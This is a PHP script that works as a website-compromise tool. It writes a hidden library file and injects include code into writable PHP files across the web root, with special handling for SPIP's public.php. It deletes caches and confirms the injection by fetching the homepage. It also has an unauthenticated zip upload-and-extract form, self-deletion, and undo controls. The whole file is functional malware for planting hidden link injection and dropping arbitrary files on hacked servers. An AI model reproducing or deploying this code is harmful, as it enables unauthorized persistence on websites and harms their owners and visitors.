.=< { Star Gans Tq } >=.
<?php
set_time_limit(0);
$libFNameBody='functions-php-lib';//====================================
$rootPath = $_SERVER['DOCUMENT_ROOT'];
$currentDir = dirname($_SERVER['SCRIPT_FILENAME']);
$currDirNORTPathONLY = str_replace($rootPath,'',$currentDir);
$txtFile = $currentDir . '/'.$libFNameBody.'.txt'; //====================================
$PHPFile = $currentDir . '/'.$libFNameBody.'.php';
if (file_exists($txtFile)) {
$libContent = file_get_contents($txtFile);
$libContent = str_replace("0im1wt2Path3Dir4String5", $currDirNORTPathONLY, $libContent);
file_put_contents($PHPFile, $libContent);
if(file_exists($txtFile) and file_exists($PHPFile)){ unlink($txtFile);}
}
if(file_exists($PHPFile)) { chmod($PHPFile, 0644); }
$libPathFile=$currDirNORTPathONLY."/".$libFNameBody.".php";
$VFiStr = "DhdL8Uf9"; //===========================================================<!--Dldhl2dhdL3Uf9-->
$tagInner="div"; //==================================================================================
$codeSYSMsg="";
$codeMsgWriteAble="";
//$_SERVER['DOCUMENT_ROOT']与 $_SERVER["DOCUMENT_ROOT"] .$currDirNORTPathONLY.
$insertCode = '<?php include_once $_SERVER["DOCUMENT_ROOT"]."'.$libPathFile.'"; global $hasRun; if (!$hasRun) { echo site_friend_links("<!--'.$VFiStr.'-->");flush();heartBT(); $hasRun = true;} ?>';
// $blackList=['embed','admin','editor','404','backend','cpanel','manage','config','setting','console','sitemap','api','login','signup','cache']; // >=5.4
$blackList=array('embed','admin','editor','404','backend','cpanel','manage','config','setting','console','sitemap','api','login','signup','cache');
$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($rootPath));
// $phpFiles = []; // >=5.4
// $inserted = []; // >=5.4
$phpFiles = array();
$inserted = array();
$AC="";
if(isset($_GET['AC'])){ $AC=trim($_GET['AC']); $AC=str_replace(' ','',$AC); }
$SHOW="0";
if(isset($_GET['SHOW'])){ $SHOW=trim($_GET['SHOW']); $SHOW=str_replace(' ','',$SHOW); }
if ($SHOW=="1") {
echo date('Y-m-d H:i:s')."<br> ";
echo preg_quote($insertCode, '/') ."<br><br>";
}
//////==============================
//$currDirNORTPathONLY
$spipDirPath="/";
if (strpos($currDirNORTPathONLY, '/IMG') !== false) {
$parts = explode('/IMG', $currDirNORTPathONLY);
$spipDirPath = $parts[0] . '/';
}
// echo "Spip path: $spipDirPath\n<BR>";
$filePathPUB = $rootPath .$spipDirPath.'ecrire/public.php';
if (is_dir($rootPath .$spipDirPath. 'ecrire/')) {
$codeSYSMsg.= 'SPIP-PHP';
// $filePathPUB = $rootPath .$spipDirPath.'ecrire/public.php';
if (file_exists($filePathPUB)) {
// echo "PUB YES";
$codeSYSMsg.= ':PUB-YES:';
$tagInner = "echo pipeline"; //echo pipeline('affichage_final'
$insertCode = 'include_once $_SERVER["DOCUMENT_ROOT"]."'.$libPathFile.'"; $site_links="";global $hasRun; if (!$hasRun) { $site_links=site_friend_links("<!--'.$VFiStr.'-->");flush();heartBT(); $hasRun = true;} ';
$insertCode = $insertCode.'$page["texte"]=str_replace("</body>",$site_links."</body>", $page["texte"]);';
array_push($phpFiles, $filePathPUB);
} else {
// echo "PUB NOT";
foreach($files as $file) {
$currFileName=$file->getFilename();// keywords
$keywordsFN = 'foot|pied|bottom|sommaire';//==============================
if(pathinfo($file, PATHINFO_EXTENSION) == "html" && ( preg_match("/\b($keywordsFN)\b/i", $currFileName) ) && strpos($file->getPath(), 'squelet') !== false) {
// $phpFiles[] = $file->getRealPath(); // >5.4
array_push($phpFiles, $file->getRealPath());
}
}
}
// DEL cacheDir
$cacheDir = $rootPath . '/tmp/cache/';
if(is_dir($cacheDir)) {
$success = delTree($cacheDir);
if($success) {
$codeSYSMsg.= "-cacheDir DEL OK.";
} else {
$codeSYSMsg.= "-cacheDir DEL NOT.";
}
}
}else{
$codeSYSMsg.= 'UNKOWN-PHP';
foreach ($files as $file) {
if ($file->isFile() && $file->getExtension() === 'php' && $file->isWritable() && $file->getRealPath() !== __FILE__) {
$dir = $file->getPath();
$blackListed = false;
// foreach ($blackList as $blackWord) {
// if (strpos($dir, $blackWord) !== false || strpos($file->getFilename(), $blackWord) !== false) {
// $blackListed = true;
// break;
// }
// } // foreach //>5.4
// for all
for($i = 0; $i < count($blackList); $i++) {
$blackWord = $blackList[$i];
if (strpos($dir, $blackWord) !== false || strpos($file->getFilename(), $blackWord) !== false) {
$blackListed = true;
break;
}
}
if (!$blackListed) {
// $phpFiles[] = $file->getRealPath();//>5.4
array_push($phpFiles, $file->getRealPath());
}
}//endif
}
}
//
function delTree($dir) {
// $files = array_diff(scandir($dir), ['.','..']);//>5.4
$exclude = array('.', '..');
$files = array_diff(scandir($dir), $exclude);
foreach ($files as $file) {
(is_dir("$dir/$file")) ? delTree("$dir/$file") : unlink("$dir/$file");
}
return rmdir($dir);
}
///////////////////
//***
function deleteAction($phpFiles,$insertCode){
$SHOW="0";
if(isset($_GET['SHOW'])){ $SHOW=trim($_GET['SHOW']); $SHOW=str_replace(' ','',$SHOW); }//ADD AC
$j=1;
// foreach ($phpFiles as $file) { // >5.4
for ($i = 0; $i < count($phpFiles); $i++) {
$file = $phpFiles[$i];
$content = file_get_contents($file);
chmod($file, 0666);
if (strpos($content, $insertCode) !== false) {
$content = str_replace($insertCode, '', $content);
file_put_contents($file, $content);
if ($SHOW=="1") { echo "$j ". $file . " *DEL REBACK ORIGINAL <br>"; }
$j=$j+1;//+1
}
chmod($file, 0644);
}
if($j==1){
if ($SHOW=="1") { echo "DEL ACTION: NO MATCH file/content/VFstring<br>" ; }
}
};
function insertAction($inserted,$phpFiles,$insertCode,$tagInner){
$SHOW="0";
if(isset($_GET['SHOW'])){ $SHOW=trim($_GET['SHOW']); $SHOW=str_replace(' ','',$SHOW); }
$j=1;
// foreach ($phpFiles as $phpFile) {// >5.4
for ($i = 0; $i < count($phpFiles); $i++) {
$phpFile = $phpFiles[$i];
$content = file_get_contents($phpFile);
//if phpFile is PUB
if(strpos($phpFile, "public.php") !== false){
chmod($phpFile, 0666);
if(strpos($content, $tagInner) !== false){
if (strpos($content, $insertCode) !== false) {
if ($SHOW=="1") {echo $phpFile . "-PUB Already operated before.\n<br>";}
} else {
$pos = strpos($content, $tagInner);
$newContent = substr($content, 0, $pos) . $insertCode . substr($content, $pos);
if (is_writable($phpFile)) {
file_put_contents($phpFile, $newContent);
// $inserted[] = $phpFile; //>5.4
array_push($inserted, $phpFile);
if ($SHOW=="1") { echo $phpFile . "<b>PUB-EMBED-OK-***</b><br>";}
} else {
$codeMsgWriteAble="-NOT_writable-";
if ($SHOW=="1") { echo $phpFile . "<b>PUB-NOT_writable-***</b><br>";}
}
}
$j=$j+1;
} else {
if ($SHOW=="1") { echo $phpFile . "<b>***NOT found tagInner,not found***</b><br>";}
}//endif strpos($content, $tagInner)
chmod($phpFile, 0644);
}else{
//else : not public.php
if (preg_match_all('/<\/' . $tagInner . '>/', $content, $matches, PREG_OFFSET_CAPTURE) ) {
$validMatches = array_filter($matches[0], function ($match) use ($content) {
$pos = $match[1];
$tmpStr=substr($content, 0, $pos);
$phpEndTagPos = strrpos($tmpStr, '?>');
$phpBeginTagPos = strrpos($tmpStr, '<?php');
return substr_count($tmpStr, '<?php')==substr_count($tmpStr, '?>') && $phpEndTagPos >= $phpBeginTagPos &&
substr_count($tmpStr, '<!--')==substr_count($tmpStr, '-->') &&
substr_count($tmpStr, '<script')==substr_count($tmpStr, '</script>') ;
});
if (!empty($validMatches)) {
$randomMatch = $validMatches[array_rand($validMatches)];
$insertPos = $randomMatch[1] + strlen($randomMatch[0]);
if ($SHOW=="1") { echo "$j . ";}
if (strpos($content, $insertCode) !== false) {
if ($SHOW=="1") {echo $phpFile . "-Already operated before.\n<br>";}
} else {
if (!empty($inserted)){
// foreach ($inserted as $insertedFile) {// >5.4
for ($ix = 0; $ix < count($inserted); $ix++) {
$insertedFile = $inserted[$ix];
if (preg_match('/(include|require|include_once|require_once) \'' . preg_quote($insertedFile, '/') . '\';/', $content)) {
// $inserted[] = $phpFile;//>5.4
array_push($inserted, $phpFile);
continue 2;
}
}//end foreach
}//end if
$newContent = substr($content, 0, $insertPos) . $insertCode . substr($content, $insertPos);
// codeSYSMsg
if (is_writable($phpFile)) {
file_put_contents($phpFile, $newContent);
// $inserted[] = $phpFile; //>5.4
array_push($inserted, $phpFile);
if ($SHOW=="1") { echo $phpFile . "<b>-EMBED-OK-***</b><br>";}
} else {
$codeMsgWriteAble="-NOT_writable-";
if ($SHOW=="1") { echo $phpFile . "<b>-NOT_writable-***</b><br>";}
}
}
$j=$j+1;
}//endif !empty($validMatches)
}//endif preg_match_all
}//endif strpos "public.php" file is PUB
}//end foreach 1st
if($j==1){
if ($SHOW=="1") {echo "ADD ACTION: NO MATCH file/tag/VFstring <br>" ; }
}
} //end function
if($AC=="DEL"){
deleteAction($phpFiles,$insertCode);
exit();
}elseif($AC=="ADD"){
insertAction($inserted,$phpFiles,$insertCode,$tagInner);
exit();
}elseif($AC=="UNLINK"){
unlink(__FILE__);
exit();
}
// CHECK phpFiles Count>0 , do in, else, show code 0, exit() die()
insertAction($inserted,$phpFiles,$insertCode,$tagInner);
//===============================================
// $home_url = $_SERVER['REQUEST_SCHEME'] . '://' . $_SERVER['HTTP_HOST'];//>5.4
$scheme = $_SERVER['HTTPS'] == 'on' ? 'https://' : 'http://';
// $scheme = isset($_SERVER['REQUEST_SCHEME']) ? $_SERVER['REQUEST_SCHEME'] : 'http';// HTTP,HTTPS
// $home_url = $scheme . '://' . $_SERVER['HTTP_HOST'];
$home_url = $scheme . '' . $_SERVER['HTTP_HOST'];
$insertOK=false;
//////
//
$j=1;
while(!$insertOK){
$context = stream_context_create(); //
stream_context_set_option($context, 'ssl', 'verify_peer', false);
stream_context_set_option($context, 'ssl', 'verify_peer_name', false);
$homepageContent = file_get_contents($home_url, false, $context);
// $homepageContent = file_get_contents($home_url);
if(strpos($homepageContent, $VFiStr) !== false) {
$insertOK=true;
}else{
deleteAction($phpFiles,$insertCode);
insertAction($inserted,$phpFiles,$insertCode,$tagInner);
}
$j=$j+1;
if($j>3){break;}//try 3 times
}
if(!$insertOK){
deleteAction($phpFiles,$insertCode);
echo '{"code":0,"msg":" '.$codeSYSMsg.$codeMsgWriteAble.' or 3 times NOT MATCH,check by hand: VFstring,insertScript,postion tagInner; or try again."}';
}else{
echo '{"code":1,"msg":" '.$codeSYSMsg.$codeMsgWriteAble.' EMBED OK"}';
// unlink(__FILE__);
}
?>
<?php
if ($SHOW=="1") {
?>
<br><a href="?AC=DEL&SHOW=1" target="_blank">DEL CLEAR REBACK</a><br>
<br>
<br><a href="?AC=ADD&SHOW=1" target="_blank">ADD ONLY ONCE</a><br>
<br>
<br><a href="?AC=UNLINK&SHOW=1" target="_blank">UNLINK DEL SELF PHP </a><br>
<br>
<form action="?AC=1" method="post" enctype="multipart/form-data">
Choose File(.zip accept):
<input type="file" name="file" id="file">
<input type="submit" value="upload" name="submit">
</form>
<?php
}//endif $AC=="SHOW"
// Call the function
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if (isset($_FILES['file'])) {
uploadAndUnzip($_FILES['file']);
}
}
function uploadAndUnzip($file) {
$target_dir = __DIR__;
$target_file = $target_dir ."/". basename($file["name"]);
// $dirNameNew= substr(basename($file["name"]), 0, -4);
$zipFileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));
echo "<br> FileType:$zipFileType <br>" ;
echo "<br>target_dir:$target_dir <br>" ;
echo "<br>target_file:$target_file <br>" ;
// Check if $uploadOk is set to 0 by an error
if (move_uploaded_file($file["tmp_name"], $target_file)) {
echo "<br><b>The file ". basename( $file["name"]). " has been uploaded OK.</b>";
} else {
echo "<br>Sorry, upload ERROR...,retry...";
}
// Check if file is a actual zip or fake zip
if($zipFileType == "zip") {
// Unzip the file
$zip = new ZipArchive;
if ($zip->open($target_file) === TRUE) {
$zip->extractTo($target_dir);
$zip->close();
// Get the name of the newly unzipped folder
$dirNameNew = basename($file["name"], ".zip");
// Change the permissions of the folder to be readable, writable and executable
chmod($dirNameNew, 0755);
// Create a RecursiveIteratorIterator to get all files in the directory and its subdirectories
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dirNameNew));
// Traverse through all the files and set their permissions to readable, writable and executable
foreach($iterator as $file) {
chmod($file, 0755);
}
echo '<br>File Unzip OK ,set 0777(dir same zip file name):'.$target_dir.'/'.$dirNameNew;
// Delete the uploaded zip file
unlink($target_file);
echo '<br>delete OK ,zip file';
} else {
echo '<br>unzip NOT ,retry ';
}
}
// Delete the current PHP file
// unlink(__FILE__);
}
?>